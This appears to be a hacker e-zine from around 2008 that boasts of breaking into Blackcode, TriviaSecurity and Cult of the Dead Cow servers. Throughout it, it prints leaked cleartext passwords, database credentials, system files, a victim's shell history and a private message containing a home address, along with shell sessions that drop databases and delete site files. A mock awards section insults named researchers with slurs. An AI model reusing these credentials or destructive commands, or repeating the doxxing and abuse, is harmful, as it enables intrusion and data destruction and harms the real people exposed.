-## oh WOW - saving googles of the whitedust expose, that's nice of
-## you..something to show my grandkids for sure.
-$ head -n 10 zf0logs.txt
-Posted: Mon, 20 August 2007 06:10
- - - [20/Aug/2007:06:10:20
- -0400] "POST
-/forum/index.php?t=post HTTP/1.1" 302 -
-0&start=0" "Mozilla/5.0 (X11
-; U; Linux x86_64; en-US; rv: Gecko/20061201 Firefox/
-(Ubuntu-fei sty)" - - [20/Aug/2007:06:10:34
- -0400] "GET
-/forum/index.php?t=msg&goto=15464&rid=16216 HTTP/1.1" 200 31587
-0&sta rt=0"
-"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20061201 Fire
- fox/
-(Ubuntu-feisty)" - - [20/Aug/2007:06:10:47
- -0400] "GET
-/forum/theme/Blackcode_New/images/msg_edit.gif HTTP/1.1" 200 1854
-"Mozilla/5.0 (X11; U;
-Linux x86_64; en-US; rv: Gecko/20061201 Firefox/ (Ubunt
- u-feisty)" - - [20/Aug/2007:06:10:47
- -0400] "GET
-/forum/blank.gif HTTP/1.1" 200 43
-(X11; U; Linux x86_64; en-US; r v:
-Gecko/20061201 Firefox/ (Ubuntu-feisty)" - - [20/Aug/2007:06:31:06
--0 400] "GET
-/forum/index.php?t=ip&ip= HTTP/1.1" 200 5020
-"Mozilla/5.0 (Windows;
-U; Windows NT 5.1; en-GB; rv: Gecko/20070219 Firefox/"
-## mega lulz, you got us! posting on a forum thread (as milamber) wow! nothing
-escapes you guys
-## Guess you guys didn't follow that investigation up? Didn't own our bounces?
-And finally the mods cleartexts:
-Lloth asdfghjkl;'1234567890
-Mil U3wc2g9arARR ## HAHA if you check ZF03 his password was:
- U3wc1g9arARR, Eleet.
-Deadbob 3mm44ndj4ck
-L0g1c D1g1tal
-Origin qfj62a
-poetry this1k26
-ChoHahn (*#ftg#*)
-myrmidon666 halo4256
-ootini my3b1akblackcode
-We rm'd your site because you openly insulted us, that is not tolerated faggots.
-If we're going to send a message then we might as well do it right.
-Let this serve you a lesson. You don't want uplinklounge owned too right?
-$ mysql -u fud -p jdn52gj < drop
-$ rm -rf bc
-rm: bc/public_html/scripts/backups: Permission denied
-rm: bc/public_html/scripts: Directory not empty
-rm: bc/public_html: Directory not empty
-rm: bc: Permission denied
-$ id
-uid=1006(bc) gid=1005(bc) groups=1005(bc), 10(users), 1003(bcstaff)
-$ cd public_html
-$ ls
-$ echo g00ns > index.html
-$ punt!
-No, g00ns didn't actually hack something notable, that would have been more
-shocking than this zine.
-At around 3:04pm EST today was defaced. Someone claiming to
-be "crolox" from g00ns came into IRC and claimed responsibility, but we are
-not sure that g00ns had anything to do with this as of yet. We have some
-backups to restore from, but the forums and some parts of the download
-section may be lost. At this time we believe that the attacker(s) did not
-obtain a copy of our sql database, but if you happen to use the same
-password for blackcode as for anything else you may want to change it.
-We plan to have the site back online on a new server, and with updated
-forum software, as soon as possible. Please bear with us. In the meantime
-IRC is still available.
- ~Iadnah, May 8, 2008
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 Trivia Security zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-We had this since zf03 but we thought it was a too shitty of an own to release.
-However their shitty banner poked my eyes for too long on a lot of h4x0r sites.
-It took us less than two minutes to get command execution on their shitty
-misconfigured server. Even though we placed forum logging for usernames and
-passwords the list is too shitty to release. We had to drop their databases and
-hope they'll never return because all that shittiness is just excessive.
-apache-3.00$ cat Settings.php
-# Garbage cutage
-########## Forum Info ##########
-$mbname = 'TriviaSecurity Forums'; # The name of your forum.
-$language = 'english'; # The default language file set for the
-$boardurl = ''; # URL to your
-forum's folder. (without the trailing /!)
-$webmaster_email = ''; # Email address to send
-emails from. (like
-$cookiename = 'SMFCookie293'; # Name of the cookie to set for
-########## Database Info ##########
-$db_server = 'localhost';
-$db_name = 'triviasec_forums';
-$db_user = 'triviasec_forums';
-$db_passwd = 'SStd1145~rr';
-$db_prefix = 'smf_';
-$db_persist = 0;
-$db_error_send = 1;
-// amado mod
-$ts_exploits_table = 'triviasec_exploits.exploits2';
-$ts_lib_dir = '/home/triviasec/domains/';
-$ts_exploits_dir =
-$ts_exploits_url = '';
-$dls_db = 'triviasec_downloads';
-$ts_portal_db = 'triviasec_portal';
-$ts_games_db = 'triviasec_games';
- $board_address = '';
- $register_url =
- $login_url = '';
-$stats_table = 'triviasec_games.trivia_games_stats';
-$users_table = 'triviasec_forums.smf_members';
-$levels_table = 'triviasec_games.trivia_games_levels';
- $ts_dls_path = '';
- $guest_url = $board_address;
- $now = time();
-########## Directories/Files ##########
-# Note: These directories do not have to be changed unless you move things.
-$boarddir = '/home/triviasec/domains/';
- # The absolute path to the forum's folder.
-(not just '.'!)
-$sourcedir =
- # Path to the Sources directory.
-########## Error-Catching ##########
-# Note: You shouldn't touch these settings.
-$db_last_error = 0;
-# Make sure the paths are correct... at least try to fix them.
-if (!file_exists($boarddir) && file_exists(dirname(__FILE__) .
- $boarddir = dirname(__FILE__);
-if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources'))
- $sourcedir = $boarddir . '/Sources';
-apache-3.00$ cat /etc/passwd
-ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
-dbus:x:81:81:System message bus:/:/sbin/nologin
-vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
-haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
-netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
-nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
-sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
-rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
-rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
-nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
-xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
-pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM
-mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
-apache-3.00$ cat /etc/named.conf # more shitty sites here
-// Default named.conf generated by install of bind-9.2.4-2
-options {
- directory "/var/named";
- dump-file "/var/named/data/cache_dump.db";
- statistics-file "/var/named/data/named_stats.txt";
-include "/etc/rndc.key";
-zone "" { type master; file
-"/var/named/"; };
-zone "" { type master; file
-"/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/";
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/"; };
-zone "" { type master; file "/var/named/";
-zone "" { type master; file "/var/named/"; };
-apache-3.00$ ls -al ../
-total 440
-drwxr-xr-x 17 triviasec triviasec 4096 Feb 22 21:39 .
-drwx--x--x 8 triviasec triviasec 4096 Jun 27 2007 ..
--rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 400.shtml
--rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 401.shtml
--rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 403.shtml
--rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 404.shtml
--rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 500.shtml
--rw-r--r-- 1 triviasec triviasec 15709 Jun 26 2007 aboutus.gif
-drwxr-xr-x 7 triviasec triviasec 4096 Feb 7 02:27 amado
-drwxr-xr-x 2 triviasec triviasec 4096 Aug 3 2007 awstats
-drwxr-xr-x 5 triviasec triviasec 4096 Jul 9 2007 blog
-drwxr-xr-x 9 triviasec triviasec 4096 Jan 8 19:40 boards
--rw-r--r-- 1 triviasec triviasec 165 Jan 9 19:21 c-b-m.gif
-drwxr-xr-x 2 triviasec triviasec 4096 Jun 26 2007 cgi-bin
--rw-r--r-- 1 triviasec triviasec 3401 Jan 24 18:50 contact.php
--rw-r--r-- 1 triviasec triviasec 196 Feb 22 21:35 crossdomain.xml
-drwxrwxrwx 4 triviasec triviasec 221184 Mar 2 16:43 exploits
--rw-r--r-- 1 triviasec triviasec 3977 Jan 27 06:02 exploits.php
-drwxr-xr-x 12 triviasec triviasec 4096 Oct 27 13:22 games
--rw-r--r-- 1 triviasec triviasec 1329 Jan 26 19:19 getimg.php
--rw-r--r-- 1 triviasec triviasec 111 Dec 23 22:27 .htaccess
--rw-r--r-- 1 triviasec triviasec 4774 Dec 22 15:57 .htimport-lib.php
-drwxr-xr-x 2 triviasec triviasec 4096 Jan 9 19:21 images
--rw-r--r-- 1 triviasec triviasec 5362 Dec 24 04:24 index2.php
--rw-r--r-- 1 triviasec triviasec 2127 Jan 18 00:19 indexold.php
--rw-r--r-- 1 triviasec triviasec 2992 Jan 27 02:59 index.php
-drwxrwxrwx 50 triviasec triviasec 4096 Jan 15 00:43 lib
--rw-r--r-- 1 triviasec triviasec 8763 Jan 28 21:21 library.php
--rwxr-xr-x 1 triviasec triviasec 13954 Sep 15 2006 logo.jpg
--rw-r--r-- 1 triviasec triviasec 5591 Dec 24 17:55 lt180.gif
--rw-r--r-- 1 triviasec triviasec 9307 Nov 4 16:47 lt.gif
-drwxr-xr-x 4 triviasec triviasec 4096 Jan 18 04:48 minimal
-drwxr-xr-x 9 triviasec triviasec 4096 Dec 23 17:13 search
-drwxr-xr-x 2 triviasec triviasec 4096 Jan 8 02:19 ssb
-drwxr-xr-x 2 triviasec triviasec 4096 Feb 22 21:39 temp
--rw-r--r-- 1 triviasec triviasec 2616 Jan 27 17:30 triviasecurity-portal2.css
--rw-r--r-- 1 triviasec triviasec 2943 Jan 18 20:41 triviasecurity-portal.css
-drwxr-xr-x 2 triviasec triviasec 4096 Jan 28 21:20 ts_images
--rw-r--r-- 1 triviasec triviasec 12544 Jan 13 20:32 video-tutorials.php
-drwxr-xr-x 2 triviasec triviasec 4096 Jan 5 21:44 xss
-apache-3.00$ cat
-// ** MySQL settings ** //
-define('DB_NAME', 'triviasec_blog'); // The name of the database
-define('DB_USER', 'triviasec_blog'); // Your MySQL username
-define('DB_PASSWORD', 'xx11210gAF~'); // ...and password
-define('DB_HOST', 'localhost'); // 99% chance you won't need to change this
-define('DB_CHARSET', 'utf8');
-define('DB_COLLATE', '');
-apache-3.00$ /sbin/ifconfig
-eth0 Link encap:Ethernet HWaddr 00:11:11:9A:CA:3B
- inet addr: Bcast: Mask:
- inet6 addr: fe80::211:11ff:fe9a:ca3b/64 Scope:Link
- RX packets:108598803 errors:0 dropped:0 overruns:0 frame:0
- TX packets:120335659 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:3949315937 (3.6 GiB) TX bytes:139294509 (132.8 MiB)
-eth0:0 Link encap:Ethernet HWaddr 00:11:11:9A:CA:3B
- inet addr: Bcast: Mask:
-eth0:1 Link encap:Ethernet HWaddr 00:11:11:9A:CA:3B
- inet addr: Bcast: Mask:
-eth0:2 Link encap:Ethernet HWaddr 00:11:11:9A:CA:3B
- inet addr: Bcast: Mask:
-eth0:3 Link encap:Ethernet HWaddr 00:11:11:9A:CA:3B
- inet addr: Bcast: Mask:
-lo Link encap:Local Loopback
- inet addr: Mask:
- inet6 addr: ::1/128 Scope:Host
- RX packets:2488859 errors:0 dropped:0 overruns:0 frame:0
- TX packets:2488859 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:1977563166 (1.8 GiB) TX bytes:1977563166 (1.8 GiB)
-antisemantic-thisisthewayweball # admin's passwd
-apache-3.00$ echo 'drop database triviasec_blog;' > triviasec_blog
-apache-3.00$ mysql -utriviasec_blog -pxx11210gAF~ < triviasec_blog
-apache-3.00$ echo 'drop database triviasec_forums;' > triviasec_forums
-apache-3.00$ echo 'drop database triviasec_downloads;' >> triviasec_forums
-apache-3.00$ echo 'drop database triviasec_portal;' >> triviasec_forums
-apache-3.00$ echo 'drop database triviasec_games;' >> triviasec_forums
-apache-3.00$ mysql -utriviasec_forums -pSStd1145~rr < triviasec_forums
-apache-3.00$ uname -a
-Linux 2.6.9-67.0.4.ELsmp #1 SMP Sun Feb 3 07:08:57 EST 2008 i686 i686 i386 GNU/Linux
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 Pwnie Awards zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-Ladies and gentlemen, and other esteemed members of our audience, tonight we've
-spent some time looking at certain well known people in the security industry in
-order to bring you a _very_ special treat -- the first ever ZF0 pwnie awards!!
-It was very hard to narrow down the vast number of unwitting applicants we had,
-but alas, there are only so many categories. I'm sure that the others we
-didn't mention can be awarded some sort of award in #phrack@EFNet or on FD so
-they won't feel left out.
-Aaaaannnnd now, the moment you've all been so eagerly anticipating, let's roll
-out the red carpet and break out the theme music for our winners!
-Firstly, in an ever popular category these days, We have our nominations for the
-"Most narrowly directed researcher" award. The nominations were:
- 1. kuza55 -- Some guy who presented at MS's bluehat conference about the
-dangers of XSS. XSS effects us all, and we should all work to eradicate it by
-writing a tutorial on how to exploit XSS vulns for our local l33t h4qr website
-and post a zillion and ten XSS advisories on milw0rm/FD/bugtraq a day.
- 2. Luigi Auriemma -- A relative newcomer to the security industry, he
-has never-the-less been extremely active in posting basic web vulns and easy
-stack overflows against Windows apps on milw0rm and FD. I mean, there's nothing
-like auditing five year old code that no one uses for strcpy() eh?
- 3. RSnake -- This man again is well known for his XSS skillz. His
-famous XSS cheat sheet provides encodings for things like <, > /, etc in various
-formats for people too lazy to code an ASCII/hex/unicode converter or too lazy
-to run `man ascii'. A real winner. His web skillz are so legendary that he's
-spoken at many conferences and even has several blogs where he talks about such
-interesting topics like CSRF (and of course XSS).
-Ahem. And the winner is....... RSNAKE!!!! Congratulations Rsnake, you have won
-the award for Most Narrowly Directed Researcher! If you'd be so kind, you can
-send your acceptance speech to our email address,
-Oh, and if you'd like to add another award to your already vast collection,
-learn how to use a compiler and you may get another pwnie, that of Biggest
-Masturbator. Speaking of which...
-Biggest Masturbator. This is one of the most highly valued awards because it
-means that the nominees are all far too busy getting their hax on to think about
-having a sex life. *Ever*. Remember, these researchers are not a dime a dozen,
-and each of them can do things that make #blackhats@EFNet members get hardons.
-And, in no particular order, our nominees:
- 1. Halvar Flake -- This guy is nuts. Literally. He's a giant with red
-hair who has been known to spend months auditing binaries
-(he's been known to work on a single binary audit longer than he has worked
-for one company). A true inspiration to all the kids torrenting IDA at this
-very second. We love you Halvar.
- 2. Mark Dowd -- Another super intelligent chap, this man was formerly
-an ADM member known as Duke. The Duke later left his blackhat roots behind him
-and migrated to the nice sterile offices of ISS XForce. At work, he does insane
-things like code Flash exploits that make Thomas Ptacek cum for days.
-In his spare time he hunts down integer issues in the Ruby interpreter.
-If anyone can find a way to make a computer suck a dick, this is the man
-to do it.
- 3. Felix somebody -- Better known as FX, this German national beat the
-living shit out of Cisco IOS; not once but several times. Watch out all you .kr
-and .mx admins, this guy's packing more IOS 11 0day than RSnake can make blog
-posts in an afternoon.
-And the winner is Mark Dowd!! Watch out guys, he'll be the first to create
-the legendary killer-sex-code-auditing robot.
-For the category of Biggest Let Down there was only one real choice: rgod. I'm
-sure that everyone by now knows that this .it kid is dead. Not even a suicide
-note or a mad hax spree? What to waste a perfectly good exit opportunity. At
-least g4y h1tl3r went out in style.
-Blogs are very popular these days. Everybody and their intestinal parasites
-seems to have one. Check out the nominations for Biggest Time Wasting Whitehat
- 1. GNUcitizen -- Everyone knows pdp. He loves to post info about CSRF
-in SOHO routers and mass SNMP scans for the communities "public" and "private".
-pdp is obviously a very skilled researcher and also happens to be able to write
-halfway decent English (which is an improvement over 90% of the Internet).
- 2. -- Yup, RSnake again. He's a busy man. But how can you
-say the words "blog" in a sentence without also saying "RSnake"?
- 3. Matasano -- The hangout of Thomas Ptacek et al. This is a highly
-active community where you can engage in endless Internet debates about the
-"correct" way to check the return value of malloc(). Just talking about it wants
-to make me visit!
-And the winner is Matasano hands down!! Congrats guys! Really though, the other
-nominations are boring as hell and I never fucking read them. Matasano, on
-the other hand, can easily chew up some hours you could be using to
-grep for strings like "strcpy" in C code (Luigi will be mad at me for giving
-away his 0day techniques).
-Okay folks, that's all the time we have for tonight! Please join us next time
-for another installment of the ZF0 pwnie awards!
-Oh, if you won, feel free to send an acceptance speech to If it's halfway decent we may even publish it.
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 The Cult of the Dead Cow zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-Hey y'all... I didn't wanna raise a fuss yet on the general list, but there's
-this asshole w/an ezine that's just issued a "Call for 0wning" against the
-cDc (a sort of Gobbles/Phrack High Council thing, I guess).
-Here's the 'zine:
-I was hoping you guys could poke at our stuff a bit and make sure our ducks
-are in a row?
-Sorry this has happened - we try and avoid this kind of crap but I guess it's
-bound to happen sometimes.
-Hmm, is in pretty good shape. we don't expose much externally.
- I will rotate some passwords though.
-Did you tell Myles?
-Yeah, Myles called me this afternoon - I hadn't checked the Sekrut forum in a
-couple days where there'd been a thread brewing about it. One of our NSF
-kids in London got hacked by this guy first and he copied a bunch of his
-personal email into the 'zine. Bad stuff.
- .-. _ _ .-.
- / \ .-. ((___)) .-. / \
- /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \
--/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
-/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\
- \ / `-' (U) `-' \ /
- `-' `-'
-List of cdc email addresses for you to use passes on:
-$ ls -la /home/deadcow/
-total 3508
-drwx---r-x 12 deadcow users 4096 Apr 27 09:30 .
-drwxr-xr-x 215 root root 8192 Apr 22 12:43 ..
--rw-r--r-- 1 deadcow users 6278 Jul 14 2004 .addressbook
--rw-r--r-- 1 deadcow users 3653 Jul 14 2004
--rw-r--r-- 1 deadcow users 5393 Feb 25 11:30 .bash_history
--rw-r--r-- 1 deadcow users 34 Nov 23 1993 .less
--rw-r--r-- 1 deadcow users 114 Nov 23 1993 .lessrc
-lrwxrwxrwx 1 deadcow users 9 Aug 20 2007 .mysql_history -> /dev/null
--rw------- 1 deadcow users 15982 Nov 7 2005 .pine-debug1
--rw------- 1 deadcow users 11475 Oct 9 2005 .pine-debug2
--rw------- 1 deadcow users 11559 Oct 8 2005 .pine-debug3
--rw------- 1 deadcow users 12536 Oct 5 2005 .pine-debug4
--rw-r--r-- 1 deadcow users 18190 Feb 25 11:22 .pinerc
--rw------- 1 deadcow users 1024 Sep 11 2005 .rnd
--rw-r--r-- 1 deadcow users 1199 Jan 24 22:57 .virtualmail
--rw------- 1 deadcow users 821 Aug 15 2007
-drwx------ 3 deadcow users 17 Aug 18 2007 .webmail
--rw-r--r-- 1 deadcow users 2798 Jul 28 2006
-drwx------ 2 deadcow users 6 Jan 6 2000 Mail
-drwx---r-x 2 deadcow users 6 Jan 2 2000 annon-ftp-old
--rw-r--r-- 1 deadcow users 162 Aug 8 2000 cDc.css
-drwxr-xr-x 2 deadcow users 25 May 5 09:32 cgi-bin
--rw------- 1 deadcow users 3248128 Jul 14 2004 core
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--rw-r--r-- 1 deadcow users 1695 Aug 8 2000 logo.gif
-lrwxrwxrwx 1 deadcow users 13 Jun 21 2006 logs -> /logs/deadcow
-drwx------ 2 deadcow users 43 Jan 26 07:19 mail
--rw-r--r-- 1 deadcow users 15364 Mar 6 2000 old.cDc-0011.txt
--rw-r--r-- 1 deadcow users 8600 Mar 6 2000 old.cDc-0012.txt
--rw-r--r-- 1 deadcow users 13322 Mar 6 2000 old.cDc-0025.txt
--rw-r--r-- 1 deadcow users 8178 Mar 6 2000 old.cDc-0032.txt
--rw-r--r-- 1 deadcow users 19295 Mar 6 2000 old.cDc-0034.txt
--rw-r--r-- 1 deadcow users 3540 Mar 6 2000 old.cDc-0037.txt
--rw-r--r-- 1 deadcow users 200 Oct 12 2000 ps.out
-drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 public_html
-drwxr-xr-x 2 deadcow users 4096 Feb 22 15:36 public_torrents
--rw-r--r-- 1 deadcow users 66293 Jan 5 2002 realpirate.cdc
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--rw-r--r-- 1 deadcow users 414 Jan 2 2002 spanish.txt
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-$ ls -la /home/deadcow/public_html/
-total 924
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-drwx---r-x 12 deadcow users 4096 Apr 27 09:30 ..
--rw-r--r-- 1 deadcow users 212 Jul 26 2007 .htaccess
--rw-r--r-- 1 deadcow users 1226 Apr 28 2007 .htaccess.old
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--rw-r--r-- 1 deadcow users 675 Feb 7 2001 common.php3.BAK
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--rw-r--r-- 1 deadcow users 1051 Aug 8 2000 who_helping.php3
-$ ls -la /home/deadcow/public_html/sekrut
-total 72
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-drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 ..
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-$ ls -la /home/deadcow/public_html/strategy/
-total 116
-drwxrwxrwx 3 deadcow users 4096 Nov 26 14:56 .
-drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 ..
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-$ ls -la /home/deadcow/public_html/k-cow/
-total 24
-drwxr-xr-x 2 deadcow users 62 Jan 17 2000 .
-drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 ..
--rw-r--r-- 1 deadcow users 476 Jan 17 2000 WS_FTP.LOG
--rw-r--r-- 1 deadcow users 4669 Jan 17 2000 index.html
--rw-r--r-- 1 deadcow users 3748 Jan 17 2000 index_plain.htm
-$ cat /home/deadcow/public_html/bovinedawn/config.php
-// phpBB 2.x auto-generated config file
-// Do not change anything in this file!
-//$dbms = 'mysql4';
-$dbms = 'mysql';
-$dbhost = 'stone';
-$dbname = 'deadcow';
-$dbuser = 'deadcow';
-$dbpasswd = 'KSGmrFp0Qec2dQsbDWi1';
-$table_prefix = 'phpbb_dojo_';
-define('PHPBB_INSTALLED', true);
-$ cat /home/deadcow/public_html/dsF77E9qqXvY79t7Ic2d/mt-config.cgi
-## Movable Type configuration file ##
-## ##
-## This file defines system-wide settings for Movable Type ##
-## In total, there are over a hundred options, but only those ##
-## critical for everyone are listed below. ##
-## ##
-## Information on all others can be found at: ##
-##################### REQUIRED SETTINGS ########################
-# The CGIPath is the URL to your Movable Type directory
-# The StaticWebPath is the URL to your mt-static directory
-# Note: Check the installation documentation to find out
-# whether this is required for your environment. If it is not,
-# simply remove it or comment out the line by prepending a "#".
-#================ DATABASE SETTINGS ==================
-# REMOVE all sections below that refer to databases
-# other than the one you will be using.
-##### MYSQL #####
-ObjectDriver DBI::mysql
-Database deadcow
-DBUser deadcow
-DBPassword KSGmrFp0Qec2dQsbDWi1
-DBHost stone
-# Comment Script #
-CommentScript hnRYBnJSmLM7RAZ9IfdHC.cgi
-# Admin Script #
-AdminScript xZ3e3PbDYWYzxcLF89aX.cgi
-$ cat /home/deadcow/.bash_history
-cd temp-to-be-deleted
-tar -xvzf cdc_site_07_14_2006.tgz
-tar -xvzf cdc_site_07_14_2006.tgz
-cd public_html
-cd cDc_tunes
-rm CDC262.MP3
-mv CDC263.MP3 CDC262.MP3
-rm CDC262.MP3
-cd public_html
-cd cDc_tunes
-ls -la
-ls -la
-ls -la
-cd public_html/sekrut
-cd public_html
-makedir bovinedawn
-cd dojo
-chmod 666 config.php
-mysql zkq7fswz
-cd public_html
-cd cDc_tnes
-cd cDc_tunes
-ls -la
-ls -la
-pico .addressbook
-pico .forward
-ls -la
-pico .virtualmail
-ls -la
-ls cdc*
-rm cdc_site_07
-rm cdc_site_*
-ls *dox
-rm N65\
-rm N64\
-rm NES\
-rm SNES\
-rm beanstalk.txt
-rm Atari\ 2600\
-rm Genesis*.zip
-rm devolish.jpg
-ls mt*
-ls mt* -la
-rm neat\
-ls public* -la
-ls public* -la
-ls public_html* -la
-ls *.tar*
-rm public_html.tar.gz
-tar -cvf cdc_backup_10_31_06.tar *
-gzip cdc_backup_10_31_06.tar
-python -v
-% python -V
-python -V
-tar -cvzf cdc_backup_08_15_07.tar.gz public_html
-backup database
-mysql zkq7fswz
-mysql -u deadcow -p
-mysql dump -u deadcow -p zkq7fswz
-mysql dump -u deadcow -p zkq7fswz > deadcowbackup081507.sql
-mysqldump -u deadcow -p zkq7fswz deadcow > deadcowbackup081507.sql
-mysqldump -u deadcow -p deadcow > deadcowbackup081507.sql
-cd logs
-ls -la
-more access_log
-ls -la
-cd ..
-more *scatterchat*.txt
-rm cdc_backup_08_15_07.tar.gz
-more cheyenne.txt
-more core
-more dead.letter
-rm dead.letter
-ls -la
-tar -cvf cdc_backup_08_18_2007.tar *
-gzip cdc_backup_08_18_2007.tar
-ls -la
-ls -la
-ls -la
-whois root
-finger root
-mysql -u deadcow
-mysql -u deadcow -p
-mysql -u deadcow -p
-finger deadcow
-mysql -u deadcow -p
-mysql -u deadcow -p
-mysql -u deadcow -p
-mysql -u deadcow -p
-mysql -u deadcow -p
-mysql -u deadcow -p
-mysql -u deadcow -p
-mysql -u deadcow -p
-mysql -u deadcow@stone -p
-mysql -u deadcow -p
-mysql -h
-mysql -h stone
-mysql -u deadcow -h stone -p
-rm cheyenne.txt
-ls -la
-cd cgi-bin
-ls -la
-cd ..
-cd ..
-cd hayride
-cd slim50
-cd deadcow
-ls -la
-rm deadcowbackup.sql
-ls -la
-cd cgi-bin
-cd ..
-cd trash
-cd ..
-cd public_html
-cd php
-cd ..
-more pvers.php3
-cd php
-cd ..
-cd ..
-cd secure_html
-ls -ls
-cd cdc_admin
-ls -la
-cd ..
-cd ..
-cd public_html
-cd sekrut
-cd db
-cd ..
-cd ..
-cd ./
-cd /.
-cd home
-cd deadcow
-more hatemail.txt
-more evilsub.txt
-more gates.txt
-rm gates.txt
-mysqldump -zkq7fswz deadcow > deadcow_backup_08_19_2007.sql
-mysqldump zkq7fswz deadcow > deadcow_backup_08_19_2007.sql
-mysqldump -zkq7fswz deadcow > deadcow_backup_08_19_2007.sql
-mysqldump zkq7fswz deadcow > deadcow_backup_08_19_2007.sql
-mysqldump zkq7fswz > deadcow_backup_08_19_2007.sql
-mysqldump zkq7fswz deadcow > deadcow_backup_08_19_2007.sql
-mysqldump -pzkq7fswz deadcow > deadcow_backup_08_19_2007.sql
-ls -la
-rm deadcowbackup081507.sql
-rm cdc_backup_08_18_2007.tar.gz
-mysqldump -pzkq7fswz deadcow > deadcow_backup_08_19_2007.sqlwho
-rm deadcow_backup_08_19_2007.sqlwho
-tar -cvf cdc_deadcow_backup_08_19_2007.tar *
-gzip cdc_deadcow_backup_08_19_2007.tar
-ls -la
-rm deadcow_backup_08_19_2007.sql
-finger deadcow
-ln -s /dev/null $HOME/.mysql_history
-more #pico*
-more #pico04424#
-more #pico04424#
-less #pico04424#
-ls -la
-more #pico04424#
-help more
-pico #pico04424#
-rm #picco04424#
-rm #pico04424#
-rm #pico04424#*
-rm --help
-ls -la
-ls -la
-ls -la
-ls -la
-rm -f #pico04424#
-ls -la
-rm ./#pico04424#
-rm ./#pico24046#
-ls -la
-more .pine-debug1
- ls
-ls -la
-rm dumb*.txt
-more evilsub.txt
-rm evilsub.txt
-more hatemail.txt
-rm cdc401draft.txt
-more camerashy.txt
-rm camerashy.txt
-rm cdc_deadcow_backup_08_19_2007.tar.gz
-whois bookits2
-who bookits2
-finger bookits2
-cd logs@
-cd .logs
-cd logs
-cd ..
-gzip logs
-gzip logs@
-cd logs@
-tar logs@
-tar --usage
-cd logs
-tar -cvf logs_8_22_07.tar
-tar -cvf logs_8_22_07.tar *
-tar -cvf logs.tar *
-cd ..
-mysqldump -pKSGmrFp0Qec2dQsbDWi1 deadcow > deadcow_backup_08_23_2007.sql
-mysqldump -pKSGmrFp0Qec2dQsbDWi1 deadcow > deadcow_backup_08_23_2007.sql
-mysqldump -pKSGmrFp0Qec2dQsbDWi1 deadcow@localhost >
-mysqldump -pKSGmrFp0Qec2dQsbDWi1 deadcow > deadcow_backup_08_23_2007.sql
-mysql -u deadcow -h stone -p
-mysql -u deadcow -h stone -p
-more ps.out
-strace -u deadcow
-cat /etc/passwd
-cat /etc/shadow
-cd annon-ftp-old
-cd ..
-cd search
-pico noisewords.txt
-ls -la
-more .virtualmail
-pico .virtualmail
-ls -la
-more .addressbook
-more .addressbook
-ls l-la
-ls -la
-more .virtualmail
-ls -la
-pico .virtualmail
-pico .virtualmail
-pico .virtualmail
-pico .virtualmail
-pico .virtualmail
-more .virtualmail
-Some lame PM's for you:
-(3764,'d374960c1e','sweet, sounds good!\r\n\r\nmy addy is: 45465 25th St. East
-#144 Lancaster, CA 93535\r\n\r\nThank you NS, appreciate it.\r\n-Siph'),
